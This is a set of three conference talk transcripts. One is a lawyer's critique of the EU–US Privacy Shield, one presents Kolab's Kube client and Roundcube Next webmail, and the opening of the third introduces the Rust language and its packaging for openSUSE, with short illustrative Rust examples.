Even worse, the terminology doesn't fit at all with our data protection terminology. And even worse, it's inconsistent and contradictory, at least in the current draft, in itself. There's stuff that simply doesn't go together. There's a choice principle, which is not a choice principle but an opt-out option, which is not quite the same, and you don't know when you can exercise it, for example. And one of the things, just to give you an example, one of the things you're supposed to be able to opt out of is onward transfer. You know, if you as a company receive certain data about me, I want to be able to say: that's fine, but you can't transfer that data onwards to someone else for whatever reason. I can opt out of that. Now, you have to ask the question: why do I actually have to opt out of it? Does that mean that if I don't opt out, it is lawful to transfer the data onwards? And if yes, why, on what basis, should that be the case?
And then you look at another principle that says: well, you can only do things with this data if it is within the original purpose for which you collected the data in the first place. So those things don't really go together. If I have a purpose limitation, how, or in most cases why, would I be allowed to transfer data onwards at all? Why should someone have to opt out of something that, according to one of the principles, shouldn't be lawful in the first place? There's a lot of that stuff. You can find 10 or 15 of those within two minutes if you look at it with an experienced eye. So there's a lot of work to be done. And those things are not petty business. It's one thing to like something on a political or abstract level, and you can discuss whatever, but if you have a set of legal rules that you cannot apply, you can simply forget the political discussion, because it's simply not going to work. And as we stand, I don't think it's going to work, regardless of whether I like it or not. Now, again, critics say: Commission, you can't do your job of assessing how things work in the United States by letting other people tell you how it works. You have to look at it yourself. And the letters that we receive, the representations that we receive, don't do the job. That's another criticism, which will play a role in an assumed court case, because that was the reason why Safe Harbor was shot down. There is no agreement at this point on when we apply whatever U.S. set of data protection rules to a case and when we apply the European set of rules. A lot of work went into that very question when they came up with the Data Protection Directive in '95, and now we have the Data Protection Regulation, which has actually entered into force and will be applicable in two years' time. A lot of thought has gone into that, and the Privacy Shield simply steps away from that question. But that's a very core question, because if you're an individual and you want to take recourse against someone, you have to tell the court on what set of rules, on which basis, you want to do that. And it's something that, I think, to make it work, you'd have to require the framework to provide a solution for. Otherwise, the judicial recourse that they want to establish, how is that supposed to work? It'll make everything very difficult, very complicated and very risky for anyone claiming their rights. So that's another criticism right there. Critics also say that even though the Commission has received information on how, and on what basis, the intelligence community in the United States essentially draws data, it's still not enough; we still don't know enough. Now, that is of course never going to change, to be honest, so that criticism will never disappear, for reasons of logic. There is no rule on when data actually, at some point, has to be deleted, because, you know, you collected it for some reason and that purpose normally expires at some point. No one ever deletes data, at least not if they're not forced to. So that's a problem. And yeah, the rest is just a bit specific, shall we say; I'll skip that. So now, what will happen? Of course, I don't know. As I said, the representatives of the member states still have to consent to whatever draft we end up with, and we don't know the draft yet.
We don't know what improvements may have been made. But I expect, and it usually happens on that level, that the member states will consent in the end, because they've spent so much energy on this. The regulation took four years to finalize. I don't think that anyone will really deny the Commission their consent, because that would mean that, from a business perspective, people would run into huge problems, and on that level that simply won't happen. So there will be consent. I don't know if we'll have something by August, but this year we will probably have an improved Safe Harbor 2. And once that's in place, it's binding. You can use it as a company, you can rely on it. But from the first day it's in place, people will again try to shoot it down. And if it does not change fundamentally, it might well be shot down within the first one or two years, because the reasons that the ECJ gave provide sufficient grounds, if you apply them strictly, to shoot this one down as well. And the court doesn't even have to go into the details. The directive calls for a comparable level of data protection in the two countries involved, the EU on the one hand and the recipient country on the other hand. And that simply is not the case. It's not comparable. I'm not going to say it's worse or better, that's a debate for another day, but it's certainly not comparable. If comparability is the test, it'll fail. That's what I believe, at least. So the bottom line is that today, and in one year's time and in two years' time, I think it will be and remain very difficult, in legal terms, to transfer data to the United States, and to other countries as well, by the way; we always focus on the United States for historic reasons. And companies, as they have done in the past and I'm sure will do in the future as well, are willing to take that risk, because they don't have a choice. The question, of course, is: product-wise, will the consumer or the corporate customer have alternative products that essentially offer the same or comparable quality and range? Because when we look at it, the reason why that hasn't been the case, at least for most people, is that the competition doesn't work, essentially. We wouldn't be talking about Facebook and Google this or that if there were an alternative. But there isn't. And that essentially is the reason behind the whole problem. Because from a company's perspective, and that's an attorney's perspective as well, at this point most companies say: I don't have a choice. I simply don't have a choice in business terms. Take a start-up, for example: I want to use Amazon Web Services. Give me something else, but I don't know it. I'll just use it because everyone else does, and I know it works, supposedly. So that won't change. Privacy Shield, whatever. It's going to be the same question, and the only real solution lies in having comparable, competing products. And we'll see where we end up. No one knows on this one. So, I thank you for your attention. I know that stuff is not for everyone, but you've been quiet, so I thank you for that. You could have been typing. Well, and thank you for having me.
Julian Höppner, a lawyer specialised in copyright and intellectual property at the JBB law firm, sailed us through the treacherous waters of Safe Harbour and poked holes in the upcoming Privacy Shield. Julian made clear that the treaties being negotiated with the US will most likely be ineffective against government snooping and corporate espionage.
10.5446/54589 (DOI)
So, hi, I'm Christian. I'm responsible for the desktop client at Kolab Systems, which so far used to be Kontact, or still is Kontact, actually. Today I want to talk about the next-generation client that we're currently working on, and tell you a bit about why we're doing this and what it is all about. So, Kube is the next-generation collaboration and communication client that we're currently building. It's aimed at offline-capable devices like laptops and mobile devices. We are looking at making it very maintainable, so that we can move forward fast without sacrificing quality on the way and can do quick iterations. We want it to be very deployable in various scenarios, because we have enterprise customers and we have private customers, so we need to be able to integrate into various deployment scenarios. This also includes mobile devices. It's supposed to be a high-performance, low-resource component, so it really can support you from the background, and you don't spin up your CPU just because you want to read a mail. From the design side we're trying hard to ensure that it is the way it should be: that you really can quickly start it and stop it again, and you don't have to worry that it uses too much RAM or anything like that. Last but not least, of course, we're working on a pretty user interface that actually also remains useful. So you may wonder why we are doing this, given that we have Kontact, which is a large and very powerful application, and it's a lot of effort to redo that. The first reason for me, as somebody who has worked for the last six years on improving Kontact, largely as a full-time job, is that it replaces Kontact. We have a lot of complexity issues, which really showed over the last couple of years as we tried to add new features: that process was just so slow and cumbersome, and it was so hard to get the quality to the state where we needed it to be, that I just realized that something must be wrong. Similarly, we have large performance issues, which then again trigger a lot of workarounds in trying to do caching and other optimizations, which again increases the complexity. So Kontact in many ways resembles a Rube Goldberg machine. You have many different components that interact with each other asynchronously. That makes it very hard to reason about the state of the application and to test it, because you have so many different combinations of those components. That is to a large degree why it's so complex and why it's so hard to test. So with Kube I initially just started thinking about how we can change the architecture of Kontact in a way that lets us combat those problems. What we ended up with was so far away from Kontact that it just made more sense to start over on a clean slate, at least design-wise. That doesn't mean we're rewriting everything, but design-wise we started on a clean slate, tried to get that right, and then looked at how we can get from Kontact to this new architecture. In the old architecture, if you're familiar with Kontact at all, we used to have the application, then a central server that talks to a MySQL database, and then different backend processes, for instance an IMAP resource or a maildir resource, to get access to your data. In Kube, we removed that central server; you still have different backend plugins.
This is useful, first of all, because these are background processes that synchronize a lot of data and do a lot of work, so you don't necessarily want that directly in your main application. It also isolates against crashes, because this is a plugin system. So you can have people write different plugins for different backends, and if one is not of the highest quality and crashes, it doesn't take down your client application. We call the data access layer Sink, so that's sort of the Akonadi replacement. You now have this library that knows how to talk to the different backends, and then the client application, which is Kube so far but could be more applications, of course, directly accesses the database in-process and just talks to the resources, because it's a single-writer, multi-reader system. If we look a bit closer at the resource, it is built somewhat like this: you basically have Kube here, and then you have communication to the backend process over a socket that just writes commands to the resource, which the resource initially simply queues. A very central piece of the resource is then the pipeline, which just works through the queue continuously and processes these items. Eventually they end up in the database, so in here we can do stuff like indexing and filtering and whatnot, any processing that needs to be applied to every modification that we have to store. And then the resource simply emits a notification that the revision of the store has changed, and all clients can update to that. This gives us a very nice loop for how the data flows. Clients always just write that way, and the other way around, they simply render the state of what you have in the database. So it becomes very testable, because you don't really have any intermediate states that you try to synchronize; you essentially just render what you have in the database. It looks very similar on the other side, where we have the synchronization to the source, so this could be your IMAP server. You have a synchronizer process that simply tries to figure out what has changed on the server. Maybe you have some protocol support like QRESYNC, which directly gives you the diff; maybe your backend sucks and you have to do a full diff. It doesn't really matter: the synchronizer simply tries to figure out as fast as possible what has changed, creates the modifications, queues them, and that's then processed by the very simple pipeline. Having two queues here just makes sure that we can prioritize, for instance, local modifications over a background sync process where you don't really care when it finishes. And then the write-back uses the exact same mechanism: it gets notified that something has changed, and then it just replays revisions to the source. That way we have these loops in both directions. As you can see, this builds right into the design that we have an offline store that you can work against, even if you have no internet connection, and you can replay changes at any later stage. What we also made sure of is that we have the right place for extensions. In Kontact, we often have these bolt-on extensions in somewhat weird places, like scam detection in your email viewer, which means it has to be done every time you look at that email. With the pipeline, we have a nice place where we can guarantee that a pre-processor always runs before something enters the system for the rest of the client. So we can do stuff like spam detection.
We can, of course, do various indexing tasks. We can do filtering, and we can do it in a way that filters the email before it enters the system, so you don't have an email that pops up in your inbox and then suddenly vanishes to pop up somewhere else. We have, of course, the pluggable backend, so you can add support for new groupware servers or whatever. And then we have composable UI components on the UI side, which will eventually allow us to do more mash-ups of different views and get away from this situation where you have your email client over here, your calendar over there and your notes application somewhere else, and they can't interact with each other. Because we don't want to rewrite everything from scratch, which would take years, obviously, we try to reuse as much as we can from Kontact and KDE PIM, so we try to refactor things into libraries that we know we can share with Kontact, so we can co-maintain them. This allows us to move much faster than if we just went and wrote the client from scratch. It also allows us to apply the lessons learned: we have a lot of experience with the Kontact code base, so we know where everything is implemented and we know what problems we faced with it. We can build on that. Another large topic is performance. In Kontact we have many performance problems, by design in a sense. One of its core concepts is that it does not know what it stores, so you can freely extend it with whatever. However, that also means you can't query for arbitrary data, which sometimes leads to somewhat ridiculous results: if you want to show a week in your calendar, what we have to do, and there's no way around it, is load all your calendar data, process it in memory, and throw 99% of that data away because we don't care about it. And that, essentially, every time you look at your calendar. The same goes for email threading. We can't query for emails by date and in a threaded fashion, so we load the full folder. If you have 200,000 emails, we load 200,000 emails into memory and then figure out the sorting, and because that is very expensive, we have various caching layers that try to somehow fix that. But that adds a huge amount of complexity, because the caches are also expensive to build, so we even store them to disk now, and it just becomes somewhat insane. You also have this disconnect between where your data is and where your application is, and you have a protocol to fetch data. But if you need too much data for what you're trying to figure out and you fetch too much, you have to load it all into memory, and at some point that becomes a problem. If you don't fetch enough, you have too many round trips, and that won't scale. So you're always trying to find the middle ground that works. With Kube we get rid of all those problems, because your database is a memory-mapped file on disk, directly in-process. You can just read whatever you need and throw away whatever you don't. It's very cheap to do multiple reads, because you're essentially just accessing a memory-mapped file. We just use a key-value store as the database. And then, of course, there's the whole startup performance: we don't have any external processes that we have to start. Resources only have to be started if you actually want to synchronize or update something. If you want read-only access, you have everything in-process. So that allows us to solve many of those problems where we previously worked so hard on working around the design constraints.
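The architecture diagrams from the slides aren't reproduced in this transcript. As a rough, purely illustrative aid, here is a tiny sketch of the command-queue / pipeline / revision loop described in the last few paragraphs. It is written in Rust only for consistency with the code examples later in this document; Sink and Kube themselves are C++/Qt, and every name below is made up rather than taken from the actual code base.

    use std::collections::{HashMap, VecDeque};

    #[derive(Debug)]
    enum Command {
        Create { id: u64, subject: String },
        MarkRead { id: u64 },
    }

    #[derive(Default)]
    struct Store {
        revision: u64,
        mails: HashMap<u64, (String, bool)>, // (subject, read flag)
    }

    #[derive(Default)]
    struct Pipeline {
        queue: VecDeque<Command>,
    }

    impl Pipeline {
        // Clients only ever enqueue commands; they never touch the store.
        fn enqueue(&mut self, cmd: Command) {
            self.queue.push_back(cmd);
        }

        // The pipeline is the single writer. Filtering, indexing or spam
        // checks would hook in here, before anything reaches the store.
        fn process(&mut self, store: &mut Store) {
            while let Some(cmd) = self.queue.pop_front() {
                match cmd {
                    Command::Create { id, subject } => {
                        store.mails.insert(id, (subject, false));
                    }
                    Command::MarkRead { id } => {
                        if let Some(mail) = store.mails.get_mut(&id) {
                            mail.1 = true;
                        }
                    }
                }
                // Stand-in for the "revision changed" notification.
                store.revision += 1;
            }
        }
    }

    fn main() {
        let mut store = Store::default();
        let mut pipeline = Pipeline::default();

        pipeline.enqueue(Command::Create { id: 1, subject: "Hello".into() });
        pipeline.enqueue(Command::MarkRead { id: 1 });
        pipeline.process(&mut store);

        // A reader simply renders the current state of the store.
        println!("revision {}: {:?}", store.revision, store.mails);
    }

The only point is the shape of the flow: clients enqueue commands, a single writer applies them to the store and bumps the revision, and readers simply re-render from the store when they are notified.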
On the UI side we have the UI completely written in Qt Quick, so we hope to be able to do much faster iterations and to figure out what the use cases are that users actually want solved. We want to take more of a user-centered design approach, not necessarily the official methodology, but we don't want to just implement features because there used to be this feature at some point somewhere. We want to support workflows. We're working a lot together with the UX people from KDE, the KDE VDG, and of course the people that we have at Kolab Systems. In the future we will do more real testing with users and try to evolve things slowly. But we're also really trying to focus on not just dumping too many features in there for the sake of it. Overall, with Kube we're building a platform for the future. This is initially, of course, hard to get started, until you're at the point where you have your minimal feature set, but it will then allow us to move much more freely in the future and actually take the client forward, not just play catch-up with Microsoft Exchange or whatever. Since we also want to go onto mobile platforms, we also make sure that the whole software stack remains very portable and controllable. In Kontact we have a huge dependency chain. With Kube we restrict that much more, which is of course not to say that we don't have dependencies; we use dependencies that make sense. But if we can avoid a dependency reasonably easily and that improves portability, then we'll go for that. We also make sure that the whole system remains testable. So we have test suites for resources, for instance: resources have capabilities, and if a resource says it knows how to deal with drafts and emails, we have a standardized test for that. If you write a new resource and say, well, my resource can do that now, then we can verify automatically everything that we expect from the client side. Of course, you have to take care yourself that the backend actually works. And then, with the platform, we also have these composable UI components, because we're doing the whole UI in QML and these QML components know how to access their data. It becomes much easier to do integration, so that, for instance, in the email view you show the actual address book component that directly gives you access to all the data and all the actions that you expect from your address book component. And we can also use that directly for desktop integration. We could directly show the Kube calendar, with all the functionality that you're used to, in a plasmoid in KDE, without having to reimplement any of the functionality. So this allows for much better and much easier desktop integration. Regarding the roadmap: we currently focus on email only, because many of the data types are list-based, and the email view gives us sort of the worst-case scenario for that, because there's lots of data. It's also, performance-wise, the worst case, because there's lots of data. That way we get to a reasonably useful product reasonably fast, and we can be sure that our design decisions make sense, because they actually scale to the use case that is the hardest. We aim for an end-user-ready release by the end of the year. We focus on getting the minimal necessary feature set in there and then rather focus on polishing that, to ensure that we can actually reach the quality that we aspire to.
So we try to restrict ourselves a bit and not go too crazy with the features. Over the next year we expect to add the other groupware components, so you have your calendar. We'll probably have an address book, of course, with the email client, but then also calendar and notes and task management. We might already have that in a preview version by the end of the year, but that's not necessarily the focus right now. And from there on, I hope we can really move forward in pushing what we can do with the client and what it actually is, add instant messaging and other features, and focus more on workflows rather than the isolated features that we had so far. So we can, for instance, support you in having meetings, which involves calendaring and email and having a chat and then taking notes and whatnot. We want to really support the user more in what he's actually trying to do. So with that we get to the demo. Interesting. So that's how it currently looks. Of course it still has many UI problems, but what we can see here is that if I switch, for instance, between these lists, we don't do any caching of any sort in the UI. In Kontact we used to cache every list every time, because it was very expensive to build. Here we built the right indexes, so we only have to query for what we actually want to show, which is a bunch of emails; that's not that hard. So we can just do that in real time, which keeps the code very simple. If you switch emails, then what's slow is that this is HTML and has to load some images from the internet. That also shows, of course, in the application startup time, because it's essentially instant; it doesn't really have to do anything. In the background it starts the resource process, so it's aware if updates come in. If the client is closed, the resource process just dies, because it has no clients anymore, so there's no point. What we also see here: if I scroll down, if you watch the scrollbar as I go down, it gets smaller, which we'll have to fix UI-wise. But the point is, even if you have 100,000 emails in your folder, we're only loading the first thousand or so right now, and then as you get to the bottom we fetch more, because we have a sort-by-date index right in the storage, and that allows us to efficiently retrieve just what we actually need. Yeah, and then you can compose email and so on, but that's of course very heavily work in progress. I've just finished the packages for the summit, so you can actually try this yourself if you like. It's obviously not ready for production. I expect it to be usable for your email reading within the next month, in the sense that you can mark emails as read and you can move them to trash. But of course it's entirely possible that it breaks over time. We don't take any care right now that it works between versions, so you sometimes have to nuke your data. It's available as packages for Fedora 23 from our OBS instance, and we have a Flatpak definition file in the KDE Flatpak applications repository, so you can build it yourself and give it a try if you like. The development planning is happening on the KDE Phabricator instance, so there you can follow along with what we're doing. There are different projects: one for the UX people, where they mostly work on mockups, and then the technical one for Sink and Kube, which follows more the implementation. There's a roadmap that you can follow. Yeah, that's it. So Aaron will say a few words on Roundcube Next.
I'll ask: should we do questions now, or later? Are there questions? Yeah. I have a question regarding encryption. Are you planning to integrate GPG support and the related KDE modules? What are your plans for extensions there? So the question was whether we plan on integrating GPG support and such for encryption, and the answer to that is yes. One of the reasons for Kube is that it will allow us to get end-to-end encryption onto mobile devices as well, which we currently can't do over the web. We already got read-only GPG support for free, because we're using the KDE PIM message viewer component, which has that stuff built in. We don't have any key management right now. There are various plans, also around improving the usability of the whole key management, so that you have it, for instance, directly in the address book, with an indication of whether you are actually able to establish a secure connection to that person. So yes, that's definitely something we're working on. Yeah. So the question was what "all platforms" means for the release by the end of the year. All platforms for that release means Linux, Windows, Mac OS X. It does not include the mobile platforms yet. For the mobile platforms we will write an entirely different UI that adapts to the form factor. That's also the reason why we have this very clear separation between the UI and the logic, which we're forced into by Qt Quick anyway, but it allows us to just put on a new UI that is actually tailored towards the form factor. And we need to handle certain things differently there, like the database. Thank you. Christian is taller than I am. I only noticed that once I stepped up to the mic. Yes, so obviously we're doing a lot of exciting work with Kube. And if you're wondering where the name came from, this was actually an intentional callback, a reference to Roundcube, which is the web app that we use with Kolab and which we've been the primary developer of for many years now. In fact, there's one young fellow right there who is responsible for quite a bit of Roundcube as well. So we ran into something of an end point with Roundcube 1 in the last year or so. It's a great application. It's used around the world; it's the most popular open source webmail app out there. But to do the things we want to do with it, the developers looked at it and went: ah, we can't really accomplish what we want to accomplish, which is things like being able to extend it more easily for integration into corporate workflows, or being able to have a UI that adapts if you're on a tablet, for instance. You may have noticed that Roundcube is not overly useful on a touchscreen device, especially on a smaller screen. We wanted to be able to get rid of the page reloads. We wanted a very nice, modern application that is seamless: you load it once and you're done. Some of the more recent mail applications on the web have all gone that way, the single-page web app, no reloads, just the data coming across, and it enables them to do quite a few nifty little things that we also want to do. But Roundcube 1 was built around the concept of server-side rendered templates. You get the end result sent to you as HTML and JavaScript, but it still relies very heavily on this concept of server-side templating. Roundcube Next makes a slight departure from this and instead moves the application entirely into the client-side web browser.
So you have a single-page web app that delivers essentially the same functionality, but without the server-side templating. You get zero page reloads and access to all of your data, whether that's your calendar or your mail or whatnot. And it also allows us to extend what we can do with the web app. So, along with Kube, which has a very similar name for good reason, there's a clear separation between the UI and the data. This not only allows us, in future, to add specific plugins and components for various use cases without having to rewrite the entire business logic behind them, but it also allows us to do things that should be quite trivial. For example, if you use Roundcube right now with Kolab, you'll notice we have a feature for tagging, and the tagging box appears in different parts of the screen depending on which app you're using. Notifications are always in the browser, and if we want to change how notifications are done, we have to go around and adjust the calls everywhere they're made. So there's a lot of duplication of effort. In Roundcube Next, there's the concept of apps. We're using Ember.js to do the creation of the assets; you don't need to run Node to run Roundcube Next, just to build it and to develop with it. This allows us to do things like having an app that does notifications. There's a publish/subscribe bus in Roundcube Next that such apps can subscribe to and publish to. So applications say "I have a notification", and the notification app can subscribe to those messages and then do whatever is necessary for notifications, be that native desktop notifications, or in-browser notifications, or whatnot. And all of that code and all of that logic can then be put into one replaceable and reusable component that lives within the larger Roundcube Next world. In addition to that, the other really exciting thing, I feel, about Roundcube Next and Kube is that we're designing both of the UIs together. Right now, if you have Kontact on one screen and you have Roundcube on the other screen, you'll notice they look somewhat different. We're doing the visual design, the workflow concepts, and all of that for both applications in tandem, with overlap in the developers and the design team. So when we have Roundcube Next and Kube both ready for production use, you'll have Kube on one screen or multiple screens and Roundcube Next on your other screens, and they'll actually look like they belong together. You'll be able to take some of your workflow from one and use it in the other. So the usability will improve across the board, and you'll be able to learn one way of doing things and just apply that to all of your applications. Along with Kube, the goal we have for Roundcube Next is to be able to deliver a usable mail application at the end of the year, so that people can start actually poking it with a stick with us, and from there we will iterate forward, feature by feature, until we have a complete replacement for Roundcube 1's current functionality with Kolab, and hopefully quite a bit more than that. So that, in a nutshell, is what we're doing with Roundcube Next on the UI side.
On the server side, the data delivery side, we are working with a number of companies, in great open source fashion, on a protocol called JMAP, which basically takes the horrible thing known as IMAP and makes it a lot easier to consume from a modern-style web application. That includes things like having a long-running update socket, so that you can see when new mail is arriving immediately, without having to continuously poll or build that on some bespoke thing on the server side — these kinds of little features. It also just removes a lot of the IMAP insanity from your code base, and you can speak it natively; the J stands for JSON. So it's really built for the modern web and for being easy to use. To that end, we plan on delivering a JMAP proxy that you can run on the server side, which will sit in front of whatever your IMAP server is. There's also work ongoing to put JMAP support directly into the IMAP server that we use, Cyrus IMAP. So at some point you'll be able to talk directly to the IMAP server, except you'll be speaking JMAP to it. But in between now and then, if you're using a random IMAP server — say you're redirecting Roundcube to Google Mail or whatever — you can use the proxy for that. Otherwise, there's not a whole lot of server-side code, and that's one of the nice improvements: it allows us to really lower the amount of weight that is placed on the server side, and the complexity of management and deployment, by moving all of that UI to the client. With that design we also expect improvements in scalability, which is great for those who are using it in, say, an ISP or ASP type environment, or large corporate or government deployments for that matter. Good. I don't have a demo because I'm not a Roundcube developer, so I can only really talk about it. But are there any questions on that? Nope. Cool. Great. So in that case, I'll fill the time a little bit more, since you asked about GPG support. There is a plugin for Roundcube 1 that does GPG through Mailvelope, and this is something we'll also be bringing to Roundcube Next, probably rather nicer. That way we have, across the board, your end-to-end encryption regardless of which application you're using at the time. Of course, your key management is still local with the web app. We don't want your keys; you don't want us to have your keys. So there is still that caveat, but you will be able to access it at least via that route. Good. Excellent. Thank you very much. Thank you.
Christian Mollekopf, one of Kolab Systems' most brilliant developers, showed off the latest breakthroughs included in Kube, Kolab's next desktop client and the cross-platform successor to Kontact/KMail. Eye-candy was to be had by all. Then Aaron came up on stage to introduce the features already available in the new version of Kolab's star web client: Roundcube Next (starts at 28:25).
10.5446/54592 (DOI)
So, hello, everyone. I'm going to talk about Rust, which is a programming language, and also about getting Rust into openSUSE and the current state of where we are. So, yeah, I'm Christoph Grönland, I'm the architect for HA at SUSE. That has nothing to do with Rust; I'm just interested in the language, so this is kind of my hobby. If you want to get the slides, you can get them from this URL. They will also be linked from the openSUSE events page, and I'll provide a PDF later. So, Rust is a programming language, developed primarily by Mozilla, intended as a replacement for C and C++, really. The idea they had was that they wanted to develop a better browser, one that wasn't susceptible to security holes to the same extent that the current Firefox is. They have a big issue with buffer underflows and buffer overflows and memory leaks and other problems like this, and they were trying to figure out a way to solve that. One way would be to switch to a managed language like Java or C# or something like that which runs in a VM, but that comes with additional problems: if you run in a VM and you have garbage collection, you have a runtime, you have unpredictable memory usage and memory implications. Basically, a modern browser is like a VM itself. It's hosting a bunch of processes, one for each tab or window, and it's hosting additional VMs inside to run JavaScript and so on. So running all that inside a VM again would mean too many virtual machines on top of virtual machines to be a viable solution. So what they wanted was a language that operates on the same level as C and C++, but avoids the problems that C and C++ have in exposing too much of the machinery of the system and letting you destroy yourself needlessly. The idea with Rust is that it's a language which makes it more difficult to do things wrong. That's the basic idea. So, today you can get the Rust compiler on openSUSE by installing from the devel:languages:rust project. The Rust compiler that we have now is a pre-built binary package, so it's not yet ready to be included in Tumbleweed, because it's not building from source entirely. To build Rust, you need Rust. I'm going to get into what that means, but currently you need a specific version of Rust to build any version of Rust, and that version is not necessarily the version that we already have in openSUSE. So, yeah, it's a tricky problem. We haven't figured out how to solve it. I'm going to go into more of that, but first I'm going to talk a little bit about the language. Well, I think I've gone into why you would want it: zero overhead, as in no runtime or VM or garbage collection. Memory safety, so a language which tries to prevent buffer overflows, and no pointer arithmetic, so you can't just point into random memory and cause problems. You can still cause all of those problems in Rust; all Rust does is make it easier to do things right in the default case and more difficult to do things wrong, whereas C, for example, makes it exceedingly easy to do things wrong without even knowing it, and very, very difficult to do things right. So that's the difference in approach. A side benefit of the way they chose to handle memory is that they also got thread safety as a bonus, and I'm going to go into a little bit of how that works. Basically, the way that Rust handles memory has implications for threads.
That means that it's impossible to create a data race, because you just can't write the code that would cause one, unless you actually have unsafe blocks in there. And yeah, the other things are that you want C-level performance and easy interoperability with C. So if these are things that are interesting to you, then Rust might be interesting as a language. I know that there is maybe a little bit of trepidation or fear, because Rust can feel very hostile: because it doesn't let you do things wrong, in the beginning, no matter what you do, you're going to get a lot of error messages when trying to compile. But I'll get into that too in more detail. So here is a very simple Rust program. It looks similar to C if you look at it just like this. Already in this there are a lot of things that are unique to Rust. For example, the exclamation mark after println means that this is a macro. And macros in Rust are, I think, most similar to macros in Template Haskell or Scheme, if you've seen those languages, and not at all like macros in C or C++. Also not especially like macros in Lisp or anything like that. So it's not as free-form as the macros in other languages, where you can do anything in a macro, including concatenating strings into new function calls. But it is quite good at doing some of those things in a safe way. For example, the println! macro just adds a newline to the end of the string and then passes it to print!, and that kind of thing is quite simple to do with this macro system. To compile and run this, you use the Rust compiler just like you would use GCC. You put this in a file, call it hello.rs, you run rustc, passing it hello.rs, and you get an executable just like you get from GCC. There's no runtime, so it doesn't link to any big library or anything like that. But it is statically linked to the standard library that it has, so the binary becomes a fat binary. Currently there is effectively no dynamic linking. There is some support for dynamic linking and they're working on making it better, but that's another one of the issues that we are looking at patching for openSUSE: we would like to be able to dynamically link to OpenSSL, for example, and currently it's not that easy. So, to scare you a little bit, here's a bigger example. This is a Rust program which creates a second thread and uses channels to communicate between the threads, and has a shared hash map where both threads try to insert into the hash map at the same time, and then the main thread tries to read from the hash map. This is the kind of thing that in C or C++ is quite difficult to do in a thread-safe way, and in Rust you can't write this code in a way that would not be thread-safe, because the compiler is aware, for example, that the hash map is not thread-aware. So it won't even compile code that involves multiple threads using a hash map directly. What you need to do is wrap the hash map in a mutex and lock it in each thread, and if you do the locking incorrectly, the compiler won't even compile the code. You can also see a few other features of Rust here. You can use modules — it has a full module system like other, more modern languages to include code from other modules. You can also, as here, for example, call std::thread::spawn without writing "use std::thread" first, so you can just fully qualify module names and access things that way.
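The slide with this "bigger example" isn't included in the transcript. The following is a minimal sketch of the pattern being described — two threads sharing a hash map behind a mutex and talking over a channel — and not the exact code from the slide:

    use std::collections::HashMap;
    use std::sync::mpsc::channel;
    use std::sync::{Arc, Mutex};
    use std::thread;

    fn main() {
        // Shared map: the Mutex makes access exclusive, the Arc makes the
        // ownership shareable across threads. Without both, the compiler
        // refuses to let two threads touch the HashMap at all.
        let map = Arc::new(Mutex::new(HashMap::new()));

        // A channel gives us one sending and one receiving endpoint.
        let (tx, rx) = channel();

        let map_for_thread = map.clone();
        let child = thread::spawn(move || {
            map_for_thread.lock().unwrap().insert("from-child", 1);
            tx.send("child done").unwrap();
        });

        map.lock().unwrap().insert("from-main", 2);

        // Wait for the message from the child thread, then join it.
        println!("{}", rx.recv().unwrap());
        child.join().unwrap();

        // Only the main thread is left, so locking cannot block here.
        let m = map.lock().unwrap();
        println!("entries: {}", m.len());
    }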
So it has some nice features like destructuring. The channel function returns both the sending and the receiving end of the communication channel for threads, and the return type is a tuple of two separate things, and you can assign each to a name in one construction. The Box::new is the convention for heap allocation: this is simply putting the value on the heap, similar to new in C++ or Java, but the memory is actually managed at compile time. Rust will ensure that you have the correct number of allocations, and every reference is scoped, so this memory is freed when both threads go out of scope, so to speak. There are a few other niceties like pattern matching that I will go into a little bit more. Something you will see a lot when you start looking at examples of Rust is this unwrap thing. Rust doesn't have exceptions, unlike Java or even C++. Instead, functions usually return what is called a Result type, which is an enum of either Ok with the value that you were after, or an error. And it actually checks at compile time that you've handled all of the cases, so it forces you to check: is it Ok? Then I do this. If it's not Ok, then I do this other thing. So here, for example, it's saying: if locking succeeds, assign the result to this m variable and let me access it within the scope of the if. You could then put an else and handle the failure, but in this case it's just ignoring the error. And what unwrap does is let you continue if everything was okay, and panic — as in, end the whole process — if there's a failure at this point. You see this a lot in example code, because in example code you don't want to clutter things with error handling. But of course, in a real program you do want to handle your errors. And the nice thing about having the unwrap thing is that you have an explicit point in the code that says: okay, this is where it's going to crash if there's a failure. So it makes it easy to find the source of a problem. The thing that Rust does is make it very explicit where your failure points are. Yeah, I'm not going to go into much more about this example right now, because it's a little bit too much, but it's just showing somewhat more realistic code than the usual example code that you get for things like this. Now, a little bit about how allocation is handled in Rust. In this example we have the main function where we allocate — this is simply a five, an integer, and it's put in a box, which means that it's heap-allocated. But its lifespan is scoped by the block in which it's defined. So box two here, for example, exists until the end of the main function. You can create a little scope like this to limit the lifetime of variables, so box three here is just going to get created and then immediately destroyed. And then in this function, box one — this value is limited to the scope of that function. Rust wouldn't, for example, let you create a box like this and then pass it out without handling that correctly. So in this example we're... yeah. So there's a concept of ownership, and of moving ownership around, in Rust. That's how it keeps track of memory: the compiler keeps track of who owns a piece of memory at every state of the program. So in this case, we start the program and we create two regular variables, and these are limited to the scope — the owner is the main function in this case.
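The allocation slide isn't reproduced here either. A minimal sketch of the scope-based freeing just described, with made-up names, could look like the following; the ownership walk-through then continues below.

    fn eat_box(boxed: Box<i32>) {
        // `boxed` is owned by this function now; the heap allocation is
        // freed automatically when it goes out of scope at the end.
        println!("destroying a box that contains {}", boxed);
    }

    fn main() {
        // Heap-allocate an integer; freed when `outer` goes out of scope
        // at the end of main. No free()/delete and no garbage collector.
        let outer = Box::new(5);

        {
            // Only lives inside this block.
            let inner = Box::new(4);
            println!("inner contains {}", inner);
        } // <- `inner` is freed here, at the end of its scope

        println!("outer still contains {}", outer);

        // Ownership of `outer` moves into the function; after this call
        // the memory is gone and `outer` can no longer be used in main.
        eat_box(outer);
    }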
